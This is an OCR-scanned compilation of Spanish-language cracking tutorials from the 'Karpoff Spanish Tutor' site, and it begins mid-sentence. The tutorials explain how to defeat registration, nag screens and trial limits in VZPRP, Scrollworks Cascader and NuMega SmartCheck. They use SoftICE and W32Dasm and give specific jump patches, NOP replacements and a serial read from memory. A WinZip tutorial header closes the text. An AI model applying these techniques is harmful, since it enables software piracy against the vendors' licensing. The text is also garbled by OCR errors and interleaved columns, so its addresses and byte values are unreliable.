puedo ejecutar la victima sin ningun problema)asi que veamos si encontramos en las String Ref 
algo interesante, procedamos a desensamblarlo con W32Dasm, ya esta ?? pues guardalo como 
proyecto para no tener que desensamblarlo de nuevo, pulsamos sobre [String-Ref] y no veo nada 
interesante, vaya putada, se me ocurre tracearlo con Apis32 , este programa da mucha 
informacion y suele ahorrar mucho trabajo. Ya os habreis dado cuenta de que nuestra victima nos 
da la opcion de registrarnos mediante el tipico Name / Serial, asi que igual guarda en el 
registro de Windows la informacion del registro si es asi Apis32 nos dara informacion sobre 
ello, ejecutamos Apis32 y cargamos vzprp.exe como lo que nos interesa es ver que hace en el 
registro de Windows borramos todas las apis que tengamos para monitorear en apis32 y metemos 
solo las que tienen que ver con el registro de Windows, que como lo hago ?? veamos un gif de 


Apis32: 


Follow API functions are spied 


ADWAPI32: RegCloseKey [ HANDLE ] a Find | 
ADWAPI32: RegConnectRegistruá [ LPSTR, HANDLE, LPDATA ] | 
ADVWAPI32: RegClonnectRegistrw' [ LPWSTA, HANDLE, LPDATA ] 122 


ADVAPI32: RegCreateKeyá [ HANDLE, LPSTR, LPDATA ] 

ADVAPI32: RegCreateKeyExó [ HANDLE, LPSTR, DWORD, LPSTR, DW'DRD, DWORD, L 
ADWAPI32: RegCreateKeyw' [ HANDLE, LPWSTA, LPDATA ] 

ADVWAPI32: RegDeleteKeyá [ HANDLE, LPSTR ] 

ADWAPI32: RegDeleteKeyw' [ HANDLE, LPWSTRA ] 

ADWAPI32: RegDeleteValueá, [ HANDLE, LPSTA ] 


ADWAPI32: RegDeletealuew' [ HANDLE, LPWSTR ] | 
ADVAPI32: RegEnumKeyá [ HANDLE, DWORD, LPSTR, DWORD ] Add | 
ADWAPI32: RegEnumKeyExó [ HANDLE, DWORD, LPSTR, LPDATA, LPDATA, LPSTR, LF 

ADVAPI32: RegEnumKeyw' [ HANDLE, DWORD, LPWSTR, DWDRD ] Del 


ADVAPI32: RegEnumValueá [ HANDLE, DWORD, LPSTR, LPDATA, LPDATA, LPDATA, L — 
ADWAPI32: RegFlushKey [ HANDLE ] Del Al 
ADVAPI32: ReghetKeySecurity [ HANDLE, DWORD, LPDATA, LPDATA ] hd ez 


Aun Imports | Exit | ¿bout | 


Para borrar todas las apis que hay en la ventana pulsamos el boton Del all ya tenemos la 
ventana en blanco, sin ninguna api, ahora tenemos que meter las correspondientes al archivo 
Advapi32.dl11 que es el encargado de gestionar las apis basadas en el reg de Windows, pulsamos 
Add y nos dara a elegir entre algunos archivos.fnl seleccionamos advapi32.fn1 y pulsamos la 
opcion Add all y ya tenemos agregadas todas la apis, tambien podemos agregarlas de otra forma 
pulsamos la opcion Imports y veremos todas las apis que manejara nuestra victima podemos 
agregarlas una a una :) pero creo que es mas comoda la primera opcion, ahora pulsamos Run y 
veamos que ocurre cuando se este ejecutado vzprp.exe intentamos registrarnos mediante Help 
Register y nos escupe el mensaje de que los datos no son validos, ahora veamos la ventana del 
apis32 se aprecia claramente que solo toca el registro de Windows al iniciarse el programa asi 
que antes de cerrar nada pulsamos en save log para guardar los eventos creados hasta ahora, los 
demas no nos importan y cerramos todo el apis32 y vzprp.exe, ahora editemos el archivo 
vzprp.log que ha creado Apis32 en el directorio donde tenemos intalada la victima, entre todo 


lo que hay lo unico que me parece algo interesante es: 


joftuareForthTechWWZPRP", DHORD:00000000,LPSTR:00000000,DHORO:00000000,DHORD:000F 


"CheckBoxH in",LPDATA:00000000,LPDATA:0071FBFC,LPDATA:00000000,LPOATA:00?1FC18) 
:"SpinEditSave",LPDATA:00000000,LPDATA:0071FBFC,LPOATA: 00000000, LPOATA:0071FC18) 


"SpinEdit: 
8:"LastProject",LPDATA:00000000,LPDATA:0071FBDC,LPOATA:00000000,LPDATA:0071FBFS) 


8:"LastProject",LPDATA:00000000,LPOATA:00?1FBF4,LPDATA:01178860,LPDATA:00?1FC04) 


joftuarerForthTechWZPRP", DHORD:00000000,LPSTR:00000000,DHORO:00000000,DHORD:000F 


:"koy",LPDATA:00000000,LPDATA:00?1FBFC,LPDATA:00000000,LPOATA:0071FC18) 


son estas lineas que cuando el programa se inicia parece que chekea en el registro si estamos o 
no registrados, fijaros en esta ultima linea donde RegQueryValueExa Chekea "Key" el sitio dode 

podria estar la clave de registro si seriamos usuarios registrados como tenemos la direccion de 
memoria donde ocurre esto vallamos al W32dasm e intentemos modificar codigo para que reciba el 

valor contrario al que esta recibiendo de "Key" como se ve, la direccion de memoria es 0047522E 
veamos que encontramos en ella, y si os fijais es una direccion que se repite bastante en el 


log (igual sacamos algo interesante :)) bueno pues buscamos y encontramos: 


* Reference To: advapi32.RegQueryValueExA, Ord: 0000h 


l 

Call 00406740 

test eax, eax 

sete bl 

mov eax, dword ptr [esp] 


20047522E ESODISF9FF 
200475233 85C0 
200475235 0OF94C3 
200475238 8B0424 


:00475240 884500 mov byte ptr [ebp+00], al 
200475243 8BC3 mov eax, ebx 

200475245 5A pop edx 

200475246 5D pop ebp 

100475247 5F pop edi 

200475248 5E pop esi 

200475249 5B pop ebx 

200475244 C3 ret 


aqui tenemos la api y su correspondiente codigo, la direccion que hemos buscado nos muestra una 


(call 00406740) pulsemos sobre [Call] y veamos que hace: 


advapi32.RegSetValueExA, Ord: 0000h 
| 


llamada 
* Reference To: 


:0040674E SBCO mov eax, eax 


Aqui lo no hace mas que saltar a un valor lejano y hacer algunas operaciones en advapi32.dll y 
retorna enseguida asi que vamos a ver que hace la siguiente llamada (call 00474fac) nos 


situamos encima y pulsamos sobre [Call] 


* Referenced by a CALL at Addresses: 
1:0047523B + 200475446 


:00474FAF 7503 
:00474FB1 BOOl 
200474FB3 C3 


Aqui es donde podemos 
cmp eax,000001 pone a 
esa direccion y evita 
que pasa (aclaracion, 
podriamos atakar a el 
7503 je 00474fba para 


jne 00474FB4 
mov al, 0l 
ret 


manipular e invertir el valor de que recibe de "Key" en esta instrusión 
1 el flag con lo que hace que jne 00474fb4 se ejecute osea que salta a 
el retorno (ret) que le sigue, bueno pues invertimos el salto para ver 
este proceso no es mas que una valoracion para ver como y por donde 
programa) tenemos que cambiar 00474faf 7403 jne 00474fba por 00474faf 
hacerlo vamos a nuestro editor hexadecimal y mediante el offset de esa 


instruccion que es 743af localizamos la instruccion en valores hexadecimales “7503 B001 


cambiamos por 7403 B001 salvamos y probamos el resultado 
las hacemo en una copia de vzprp.zip) 


Unregistered version! 
System messages, 


es una buena señal probemos a hacer alguna prueba, 


(recordare que estas modificaciones 
redobleeeeee ejecucion y..... VaYA !! el mensaje de 

que canta nada mas ver el programa a desaparecido y en su lugar vemos 
pero ohh todo sigue igual, 


que coño hacemos ahora bueno de momento dejamos los cambios que hemos hecho por lo menos ya no 
Canta tanto el mensaje rojo ese y el programa funciona igual osea que algo hemos adelantado je 


hay que ser optimistas :). 


Cambiando la tactica, sabemos que cada 10.000.000 de password sale el Nag no? pues pasemos a 
hexadecimal ese numero y rastreemos en busca de la instruccion que que chekea el asunto, 
10.000.000 en Hexadecimal es = 989680 haber si tenemos suerte y encontramos coincidencias, 
metemos el numero en la opcion buscar (la linterna) Bien !! tenemos suerte y encontramos la 


primera, ademas tiene toda la pinta de estar hay para hacer esa comprobacion :) 


:00484DC7? 803800 
:00484DCA OFS5E5000000 
:00484DDO 600 


cmp byte ptr [eax], 00 
jne 00484EB5 
push 00000000 


:00484DD7? 8B0504644900 
:00484DDD 8B1508644900 


mov eax, dword ptr [00496404] 
mov edx, dword ptr [004296408] 


Y tenemos un bonito salto que si queremos la puede evitar jeje pues no se hable mas y adelante 
convirtamos ese condicional a un incondicional ousease jne por jmp el cambio a realizar (para 


los que no os empapais mucho todavia) 


:00484DCA 0F85E5000000 jne 00484EB5 por :00484DCA E9E6000000 3jmp 00484EB5 


Que como se que el valor E9E6000000 Corresponde a un salto incodicional a la mima direccion de 
memoria (00484EB5) que nuestro :00484DCA 0F85E5000000 jne 00484EB5 , bueno en Casi todos mis 
manuales lo explico asi que este por se el n*17 no lo explicare, si alguien tiene dudas que 
consulte los anteriores, creo que en Casi todos esta explicado. Bueno a lo que vamos metemos la 
direccion del offset 841CA en el editor hexadecimal y veremos 0F85 E500 0000 lo cambiamos por 
E9E6 0000 0090 Que que pinta ese 90 puesto hay?? pos muy facil tenemos que sustituir 6 bytes 
pero al cambiar el salto a un salto incondicional este solo se representa con 5 bytes entonces 
lo que hacemos es anular el sexto. Bueno una vez realizados los cambios probemos, hacemos una 
prueba y OK el Nag que escupia cada 10.000.000 de passwords ya no es un problema jeje. Ahora 
seria igual de facil localizar la rutina que chekea que salga el nag Cada 10.000 pasword, seria 
lo mismo pasar a hexadecima 10.000 (que son = 2710) y buscar las posibles coincidencias, pero 
ojo 2710 es una cifra que nos la vamos a encontrar muchas veces, por que la busqueda no va a 
mostrarnos solo las coincidencias de la instruccion relacionada, sino que nos va ha mostrar 
todas esto incluye direcciones de memoria etc. pero esto no es ningun problema ya que es bien 
facil distinguir cual es solo tenemos que descartar las que aparezcan en direcciones de memoria 
y buscar las que coincidan con el valor de una instruccion (push 00002710 o Mov xxx,00002710 
tc.) pero eso qu 1 valor sea exacto a 2710, bueno pues a partir de aqui si quieres puedes 


seguir por este camino o podemos cambiar la tactica e ir a por algo mas seguro, Me explico. 


Sabemos que cada cierto numero de comprobaciones saca un nag, nosotro hemos manipulado la 
instruccion que chekea la comprobacion de 10.000.000 de password, pero tiene que haber una 
instruccion encargada unicamente de que salga el nag y que se pueda modificar sin necesidad de 
que afecte a otras instrucciones, asi que busquemos esa instruccion y veamos de que va, sabemos 
que esa instruccion esta relacionada con el salto que hemos manipulado no?? pues solo tenemos 
que tracearla paso a paso con nuestro debugger y observar en que preciso momento lanza el nag, 


que os parece?? es por Cambiar de tactica y aprender algo mas, pues al atake: 
Cargamos nuestro debugger preferido (softice o TRW2000) y seleccionamos vzprp.exe (pero aque 


sea virgen, osea una copia sin manipular) la cargamos con el debugger y ponemos um break point 


en la direccion del salto manipulado osea 


:00484DCA0F85E5000000 jne 00484EB5 


BPX 00484dca [RETURN] 


Algunas obserbaciones: el primer nag saldra cunado chekee 10 millones de password con lo cual 
si ponemos el Break Point nada mas empezar a chekear password nos podemos morir hasta dar con 
la instruccion que lanza el nag ya que pasara por esa direccion de memoria 40.000 veces (por 
decir algo) entonces mejor de momento no ponemos el Brak Point y corremos Vzprp.exe desde el 
debugger, y y lo hacemos que testee cualquier zip protegido estamos atentos para cuando llegue 
a mas o menos 9.999.999 pasword comprobadas interumpimos el proceso pulsando [Ctrl + D] los 
que utilizais Softice o [Ctrl + N] los que ulilizamos TRW2000 y eso se trata de interrumpir el 
proceso lo mas cerca posible a 10 millones, yo lo he parado en 9.931.363 ahora es cuando 


ponemos el Brak Point a nuestro salto :00484DCA0F85E5000000 jne 00484EB5 


BPX 00484dca [RETURN] 


si os habeis quedado bastante alejados de 10.000.000 vamos pulsando F5 hasta que nos 
hacerquemos un poco, para saber cuanto os vais acercando pulsais F4 y mirais , pulsais 
nuevamente F4 y otra vez a softice, ahora vamos traceando con F10 hasta que salte el nag con 
tener pulsado F10 es suficiente (es para ir mas rapidos) y derrepente boom!! el nag atencion 
ahora pulsamos en OK y nos devuelve al softice justo debajo de la instruccion que ha sacado el 


nag que si todo os ha ido bien al pulsar OK aparecereis en: 


:00484E6A 8B45EC mov eaX, dword ptr [ebp-14] 

:00484E6D 8B10 mov edx, dword ptr [eax] 

:00484E6F FF92D8000000 call dword ptr [edx+000000D8]-- Esta es la responsable del Nag 
:00484E75 83F802 cmp eax, 00000002 -— Aqui aparecemos al pulsar OK en el Nag 
:00484E78 750E jne 00484E88 


4841 


454239 
454515 
45CD26 
48310B 
483130 


EGF 


485196 
487FC8 
48A829 
48BCB3 
48C035 
48C92D 
48CB40 
48D34F 
48D6A8 
48D744 


Email 


Bueno pues ya hemos localizado quien saca el maldito Nag ahora solo tenemos que eliminar esa 
instruccion (ah acordaros de borrar el break point del softice), para hacerlo localizamos el 
offset que es 8426f y vemos FF92 D800 0000 asi que para eliminar la instruccion lo sustituimos 
por 9090 9090 9090 salvamos los cambios y probamos, je hemos tenido exito ya no hay nag, ohhh 
pero ahora nos sale el de las 10.000 password, que quiere decir esto?? pues que posiblemente 
existan mas instrucciones iguales en otra parte del codigo pero buscarlas es bien sencillo solo 


tenemos que coger el valor hexadecimal de 


call dword ptr [edx+000000D8] que era FF92D8000000 y buscar todas las coincidencias en el 
W32dasm, pos vamos alla, y aparecen 16 coincidencias Mnnnn son muchas solo una de ellas 
seguramente es la que sacara el nag de las 10.000 pasword, Como sabemos cual es?? muy sencillo, 
apuntemos las direcciones de memoria en donde se encuentran todas las coincidencias en mi caso 


han sido en 


-- a este no hace falta poner un BP, ya lo hemos eliminado. 


Ahora solo tenemos que poner unos Break Points a todas estas direcciones y correr el programa, 
cuando salga el nag se interrumpira el proceso y se parara en una de esas direcciones en la que 
se pare es la encargada de escupir el nag de las 10.000 password seguimos los mismos pasos que 
con el anterior y ya esta, tenemos el programa 100 x 100 funcional, jeje y con la primera 
operacion del registro de windows que hicimos al comienzo del manual hemos eliminado hasta el 


unrregistered version :-). 


Bueno espero que os sirva para ampliar algo vuestros conocimiento, he intentado dar a entender 
que siempre se pueden tomar varios Caminos mientras estamos crackeando un programa, se trata de 
ir valorando mientras lo trabajas y pensar en todas las posibilidades, yo siempre os recomiendo 
que no sigais siempre los mismos atakes intentar pensar e imaginar otras formas de atakar, este 


programa tiene muchas mas maneras de atakarle, como siempre es un placer escribir para vosot(ts 


Cualquier duda, critica, sugerencias 


Saludos a todos y especialmente a INT!,KUT ,WKT ,TUTORIAL LETAL ,KarlitoxZ ,Esiel2 y a todos 


los que me envias vuestros emails con dudas e ideas. 
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INTRODUCCION 


Bueno amigos otra vez por aquí con el tercer tutorial, espero les 
sea de utilidad ya que yo aprendí un poco mas con este 

programa, por cierto un saludo a todos los que me han escrito, 
empecemos, este programa es otro de los tantos que 

existen en internet que con solo unos cuantos pasos podremos 
encontrar un serial valido para poder registrarnos. 


AL ATAKE 


Para empezar necesitamos 


vez Cargado el soft-ice, 
scrollworks cascader que 
ejecutemos el programa y 
siguiente ventana ¡! 


E Cascader 


1) Select an item below to 2) Press £dd to put the item a 
add to your start menu. in your start menu. = 


Vaya Vaya ¡!! Como verán 


reiniciar la P-cera para cargar el soft-ice , una 
instalemos el programa 

desde este momento le llamare “SWC” ¡!! Bueno 
nos manda a la 


About 
My Computer contains shortcuts— Pemoyve All 
to your Drives, Printers, Control = 
Panel, Dial-Up Networking, and : 
Scheduled Tasks. Begister 


Help 
¿Add 
[_sós |] Al 


¡1111! PAN CON LO MISMO ¡!!!!! Claro amigos ahora 


demos clic en el boton llamado 
“REGISTER” y aparecemos aquí: 


Register Scrollworks Cascader E3 
User name: REZTE 


Registration code: [1111111111] Cancel 


To obtain your registration code, please visit the Scrollworks web site. 


he insertamos un User name y Registration Code, en mi caso pondré como 
aparece en la imagen, una vez insertado 
damos a clic en OK y nos aparece una ventana : 


CASCADER 


xl N Invalid registration key. The User name or Registration code is not correct. 


como pueden ver es una típica messagebox bueno pues manos a la obra, a 
buscar un serial valido a ver piensen cual 

seria el siguiente paso ? mmmmmm. Ya bueno , pues damos CONTROL D y 
aparecemos en el soft-ice y ponemos un 

bpx (breakpoint) , probemos con bpx getwindowtexta damos otra vez CONTROL 
D he insertamos los datos y 


damos clic en OK y nos manda directamente al softice- “ vaya vaya si que 
tenemos suerte, le atinamos a la primera ” 
bueno ahora veamos el código mmmmmmm. Veamos ¡!!!!! 


llamada a getwindowtexta ------ 
USER32 ! GETWINDOWTEXTA 

0167: bff51804 mov cl,b2 

0168: bff511806 push ebp 


bueno entonces a ver demos f12 para que nos regrese a la parte del código 
que hizo la llamada a el bpx, y aparecemos 
en el siguiente codigo: 


0167: 00415290 mov ecx [ ebp/10 ] 
0167: 00415293 push ff 


bueno desde aquí nos vamos dando f10 hasta encontrar lo siguiente: 


0167: 00402c7a call 00402720 ------- llamada a la rutina de comprobación -- 


0167: 00402c7f add esp, Oc 


0167: 00402c82 test eax,eax 


0167: 00402c84 3z 00402d29 salto condicional si nuestro numero 
es falso = 0 


una vez encontradas esta rutas , damos D EBP y miramos nuestra ventana de 
datos del soft-ice y vemos lo siguiente: 


066f£: 0O065EED8 01 00 00 00 32 31 34 33 38 30 33 37 35 53 00 00 
asa 2143803755.. 


hey que es esto un numero extraño, que tal si lo apuntamos ya ¡!! Bueno 
ahora damos CONTROL D para terminar la 

ejecución del programa y quitamos todos los bpx con la instrucción BC*, y 
listo vamos a la ventana de registro e 

insertamos el numero que apuntamos y ¡!!!!!! 


bueno Ufffffffff!!! ;) creo que este arroz ya se cocio ¡!! , 


bueno amigos me despido, diciendo que la practica hace al maestro, UNA 
SALUDO A todos mis amigos: 


SKUATER (maestro saltamontes aquí esta el alumno pequeño saltamontes.... 
KARPOFF ( gran amigo y grandioso cracker) 

XASX (nuestro Presindente yea!!!) 

KARLITOXZ ( espectacular persona ) 


Matrix ( del grupo Kracker United Team 2000 Muy bUen Cracker ; ahí LA 
llevas Amigo ) 


y a todos los Miembros de TnT .. 


Tutor by: PrQfEsO0r X profesor _xfthotmail.com 


Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Karpoff Spanish Tutor: 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Numega smartcheck V.603 


Programa: 


PROTECCION: Name / Serial, Limitacion de Tiempo. 

Descripcion: Debuger para programas en visual basic. 

Dificultad: Novato Avanzado. 

DOWNLOAD: http://karpoff.tsx.org 

Herramientas: Softice, W32dasm, Editor Hexadecimal 

CRACKER: Fanega. FECHA: 5/6/2000 


| INTRODUCCION 


Hola a todos. Ante todo decir que soy nuevo en este arte, y que ha fecha de hoy hace solo dos semanas que 
empece ha leer tutoriales en la web de karpoff. Digo esto por si alguien mas experto lee este tutorial perdone 
los fallos que pudiera contener. 


Bueno a lo que vamos, con este programa veremos que cuando se nos complican las cosas, bien por que el 
programador nos quiere joder vivos, o por que nuestro conocimiento no da para mas, siempre tenemos otro 
camino para seguir adelante, o incluso cuando mas se empeñan en complicarnos las cosas nos las dan en 
bandeja. 


Este programa tiene limitacion de tiempo de 45 dias, como primera idea intentaremos hacerle funcionar con 
cualquier nombre y numero de serie. 


AL ATAKE 


Primero instalaremos el programa, durante la instalacion nos pedira nuestro nombre, el de nuestra 
compañia y el numero de serie. Pues metemos los nombres pero no el numero de serie, le damos a next y 
nos dice que si lo queremos instalar como version de demostracion y le decimos que si, el programa se 
instala perfectamente. 


Bueno vamos a probar este programita, ejucatamos smartcheck y se habre el programa pero no nos 
muestra ninguna pantallita de que estamos en el periodo de evaluacion, cargamos alguna aplicacion y le 
damos al boton start, lahora¡ ahora si que nos enseña una nag screeen informandonos de que nos quedan 
45 dias de evaluacion con tres botones (ok, cancel y purchase), le damos al purchase y nos enseña otra 
nag para que metamos nuestro nombre, nombre de compañia y codigo de desbloqueo, demosle lo que 
nos pide metemos un codigo y nombre al azar y pulsamos OK, y por fin lo que buscabamos el mensajito 
tipico de error YOU HAVE ENTERED AN INCORRECT CODE, esto debe ser algo asi como a mi no 
me chulees. 


Paso a seguir, si, si ya se lo que estais pensando nos vamos al w32dasm y buscamos esta cadena en el 
string ref, muy bien hacerlo yo ya lo he echo y no he visto ni torta, recordad que nos es necesario que las 
rutinas de proteccion esten en el ejecutable, ni que esten en otro archivo que este en el mismo directorio 
que smartcheck como veremos mas adelante. 


Regresemos donde estabamos con el mensaje de error habierto, y le damos a Ok para que se cierre. 
Habrimos el gran ojo que todo lo ve nuestro particular gran hermano, el gran SOFTICE, sabes como se 
hace no (ctrl+d), metamosle un breakpoint para cazar la nag del mensaje de error, empiezo a meterle los 
tipicos messageboxa, getwindowtexa etc. ¿pero que pasa? no me hacepta ninguno que es esto, tras un 
momento de paron neuralgico, me doy cuenta que al parecer estas rutinas de proteccion estan en modo 
de 16 bytes por eso no me aceptaba ningun breakpoint, sabeis de que hablo ¿no? en 32 bytes ponemos en 
los bpx la -a- al final y en modo 16 bytes no, pues metamos -bpx getwindowtext- cerramos el sice con 
FS. Estamos en la pantalla en la que tenemos que darle nuestros datos al smartchek, metemos los que 
queramos y pinchamos sobre OK y salta el sice, hemos acertado con el breakpoint sigamos, pulsamos FS 
hasta que salte el mensaje de error y vemos que salta a la tercera vez de pulsar FS, pues le damos a OK y 
repetimos todo el proceso cuando aparezca el sice pulsamos solo dos veces F5 y paramos, vamos a ver 
quien nos a mandado aqui pulsamos F12 dos veces y aparecemos en tl32v20 que es el encargado de 
proteger nuestro programa. 


Nos fijamos en nuestro codigo: 


:10003EDO FF15DC630110 Call dword ptr [100163DC] 

:10003ED6 8D45D8 lea eax, dword ptr [ebp-28] 

:10003ED9 50 push eax 

:10003EDA E885E9FFFF call 10002864 

:10003EDF 83C404 add esp, 00000004 

:10003EE2 8D45EC lea eax, dword ptr [ebp-14] 

:10003EE5 8D4DEC lea ecx, dword ptr [ebp-14] 

:10003EE8 50 push eax ------ lleva nuestro unlock code 

:10003EE9 51 push ecx ------ lleva el codigo bueno 

:10003EEA E891170000 call 10005680 ----- rutina que compara los codigos 

:10003EEF 83C408 add esp, 00000008----------- aparecemos aqui 

:10003EF2 85CO0 test eax, eax 

:10003EF4 7553 jne 10003F49 -------- salta si has sido malo. 

:10003EF6 8D45EC lea eax, dword ptr [ebp-14] 

:10003EF9 50 push eax 

:10003EFA 6885450110 push 10014585 

aparecemos en 015f : 10003EEF despues de una llamada a una rutina que compara los codigos, la 
siguiente linea del codigo es una comprogacion del valor devuelto por esa llamada, y en 015f:1000EF4 
el salto nos manda al mensaje de error, tendremos que cambiarlo. Pero antes fijemonos un poco mas en 
el codigo,. arriba de la llamada a la comprobacion de los codigos tenemos un push eax y push ecx bueno 
pues si poneis en el sice - d eax - veremos el numero del codigo que habiamos metido, y si ponemos - d 
ecx - nos enseñara en la pantalla de datos del sice un numero largo que resulta que este es el bueno, 
¿como puede esta jente hacer esto? por una parte nos lo intentan complicar todo lo que pueden, y por la 


| otra a la primera de cambio me entregan el codigo de desbloqueo en bandeja, para mi mejor je je. 


Ahora vosotros direis por que queremos calentarnos mas la cabeza si ya tenemos el numero guay, pues 
muy sencillo este programa cada vez que se instala crea un numero de serie diferente, a partir del cual 
genera el codigo de desbloqueo, por lo tanto este numero no valdria para nuestros amigos o si volvemos 
a instalarlo no nos serviria, mientras que si reventamos el programa y hacemos un parche si que puede 
valer para siempre a quedado claro. 


Estabamos en que teniamos que cambiar este salto 10003EF4 7553 ¡ne 10003F49 podriamos cambiarlo 
por un je o por un nop. Vamos a desensamblar el archivo t132v20 con el w32dsam pero sorpresa donde 
esta el p.... archivo, en el directorio de smartcheck no esta a saber, habra que buscarlo para esto windows 
nos hechara una mano, vamos a la barra de inicio-buscar-archivos o carpetas ponemos t132v20 y buscar 
vemos que aparece en el directorio de windows con que se queria esconder !eh¡, continuemos con el 
w32dasm y busquemos tl32v20 que ya sabemos donde esta y carguemoslo, ahora pinchemos en goto 
code location y metemos el numero 10003EF4 que nos llevara directamente al salto que queriamos, 
busquemos el offset de esta direccion de memoria, miremos en la parte de abajo de la pantalla que pone 
line tal. page cual. code data 1000EF4. offset 000032f4 lo apuntamos y cerramos el desensamblador, 
habrimos cualquier editor hexadecimal y buscamos este offset apareceremos en 75 53 si queremos que 
no salte cambiaremos el 75 que es igual a jne por 74 que es igual aje o otra opcion seria cambiar 75 53 
por 90 90 que seria igual a nop nop, la segunda opcion nunca saltaria metamos el codigo que metamos, 
pero en la primera opcion si tenemos mas chorra que felipito tacatum y acertamos metiendo el codigo 
correcto nos daria error. 


Una vez hecho esto comprobamos si funciona habrimos smartcheck metemos cualquier codigo y bingo 
nos da las gracias por registrarnos, pero cuando volvemos a habrir smartcheck nos vuelve a mostrar la 
dichosa pantallita, mal rollo para un novato como yo. 


Voy a intentar pensar como los grandes pofesionales, el programa cuando le damos a start vuelve a 
comprobar el codigo o si estamos registrados, intentare atacar esa llamada de comprobacion que hay 
arriba de nuestro salto, me meto en la rutina y veo un monton de llamadas hacia esa rutina, si solo 
hubiese sido una la podriamos haber atacado, pero encima de ser bastantes el programa cada vez que 
pulsamos start hace la llamada a esa rutina desde una posicion de memoria distinta. Dios mio que dolor 
de cabeza casi me se todo el proceso de esta proteccion. Bueno como seguir, ya tengo el numero de serie 
pero quiero hacerlo de otra manera. 


Pensemos, el proceso de proteccion corre en otro archivo que no es el ejecutable o sea smartcheck.exe, 
este ejecutable en algun momento tiene que hacer una llamada a este archivo, vamos a localizarla. 


3er intento: hay que eliminar la llamada a la proteccion y ponerle el valor que esta devuelve despues de 
pulsar OK en la pantalla de faltan x dias para que finalice esta demo. 


Estamos con smartcheck habierto y con un programa cargado, antes de pulsar sobre start que es cuando 
se llama a la proteccion, habrimos el sice (ctrl+d) y ponemos un breakpoint tal cual como - bpx 
dialogboxparam - ya digo el que puse directamente por que esto ya se esta haciendo demasiado largo y 
tengo que cenar, bueno cerramos el sice FS y pinchamos sobre start y salta el sice, pulsamos F12 y nos 
sale la pantalla de que nos quedan 45 dias, pinchamos sobre OK y salta otra vez el sice pulsamos F12 y 
estamos en el kernel de windows, fijaos en las letritas verdes del sice, pulsamos otra vez sobre F12 y 
estamos en la libreria t132v20 nuestro archivo recordais, pero nosotros queremos ver el ejecutable 
cuando llama a esta libreria, pulsamos F12 y estamos en otra libreria pulsamos F12 hasta que en la parte 
de abajo de sice en las letritas verdes aparezca smartcheck, aparecemos aqui: 


:0040E462 FF75BO0 push [ebp-50] 
:0040E465 6898264000 push 00402698 
:0040E46A 688C264000 push 0040268C 


:0040E46F FF152CA54200 call [0042A52C]--------- llamada a las rutinas de proteccion------- 
:0040E475 85C0 test eax, eax ------- nos devuelve aqui----------- 
:0040E477 7415 je 0040F48E -------- da el visto bueno--------- 


| :0040E479 83BE9000000000 cmp dword ptr [esi+-00000090], 00000000 


|:0040E45F FF75EC push [ebp-14] 

:0040E462 FF75BO push [ebp-50] 

:0040E465 6898264000 push 00402698 

:0040F46A 688C264000 push 0040268C 

:0040E46F B801000000 mov eax, 00000001 

:0040E474 90 nop 

:0040E475 85C0 test eax, eax 

:0040E477 7415 je 0040F48E 

:0040E479 83BE9000000000 cmp dword ptr [esi+00000090], 00000000 


Vemos que nos devuelve despues de pinchar sobre OK aqui en 0040E475 que hace una comparacion y 
luego un salto, lo veis claro no, ese salto hay que machacarlo, pues no, yo ya lo he probado y si lo 
cambias da un error, asi que hay que atacar a la llamada que esta mas arriba 0040E46F FF152CA54200 
call [0042A52C], para que no haga la llamada, pero si la quitamos poniendo 6 nops, el programa no hace 
nada cuando pulsamos start, ya no nos enseña la nag de los dias ni caducaria, le hemos quitado la 
proteccion, pero el programa no hace nada, bueno pues hay que ver que registros cambian desde que 
entramos en la llamada hasta que pulsamos Ok y salimos, quitamos los bpx que tengamos y ponemos 
dos bpx 0040E46F y bpx 0040E475, veis la idea el programa se parara antes de entrar en las rutinas de 
proteccion y cuando salga para fijarnos en todos los registros, hacemos todo el recorrido y vemos que 
cuando se para en el primer bpx el valor de eax es O y cuando volvemos de pulsar OK y se para en el 
segundo bpx el valor de eax es 1, pues ya lo tenemos, hay que quitar el call y subir eax a 1, vamos a ver 
como cambiar esto. 


Ejecutemos todo otra vez y nos paramos en el primer breakpoint que pusimos recuerda 


0040FE46F call [0042A52C]--------- primer breakpoint------- 
0040E475 test eax, eax ------- segundo breakpoint----------- 


Fijaos que si restamos estas dos posiciones de memoria (0040E475-0040E46E) nos da 6 bytes que es lo 
que ocupa la instruccion call [0042A52C], o sea que si queremos quitar esta llamada tendremos que 
sustituir los 6 bytes por nops, si no lo hacemos asi nos saldran instruccion por enmedio y nos joderia el 
programa. Y como cambiar estos bytes, estamos encima de la direccion 0040E46F, ponemos en sice - d 
eip - y en la ventana de datos nos sale esta direccion con los bytes en hexadecimal. pues nos situamos 
sobre el primer byte de esa ventana y cambiamos los 6 primeros bytes por 90 y pulsamos enter, Veis en 
la ventana de codigo como nos han salido 6 lineas con nop. Ahora nos queda subir eax a 1 en el sice 
metemos una a y nos sale esto 015F:0040E46F escribimos mov eax,1 y pulsamos dos veces enter, antes 
que nada pongamos otra vez d eip y fijemonos en la pantalla de datos y apuntamos los 6 primeros bytes 
que habran quedado asi: B8 01 00 00 00 90, como ya hemos terminado con el sice lo cerramos pulsamos 
ES un par de veces y ya se ejecuta el smartchek perfectamente sin mostrarnos la pantalla de limitacion. 
Ahora hay que cambiar lo que hemos hecho sobre el codigo del programa porque lo que hemos hecho a 
sido cambiarlo en memoria y cuando volvamos a arrancar el programa se habra borrado. 


Supongo que ya sabreis como cambiarlo, ya lo hemos hecho antes teneis que buscar el offset en 
w32dasm de la direccion 0040E46F e ir al editor hexadecimal y cambiar los 6 bytes que habiamos 
cambiado en memoria. 


conclusiones: 


Hemos visto la fragilidad de estos programas que usan protecciones ajenas a este. Me explico esta misma 
proteccion la he visto en otros programas que no son de numega, por lo que deduzco que esta proteccion 
numega la ha comprado y la ha pegado a su programa, con lo cual la facilidad con que la hemos quitado. 


Un saludo a todos. Gracias a Karpoff y a todos los que teneis un tutorial en su web, sin vosotros saberlo 
sois mis mentores en este apasionante arte llamado INGENIERIA INVERSA. 


Por Fanega. fanegal Oairtel.net 


sobre 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: Winzip 7.0 


PROTECCION: mag Screen molesta. 

Descripcion: Descompresor, compresor de archivos. 

| Dificultad: | Principiante 

DONNLOAD: mu inzip.con 

Herramientas: Softice, W32dasm, Editor Hexadecimal 
CRACKER: Fanega FECHA: 11/6/2000 

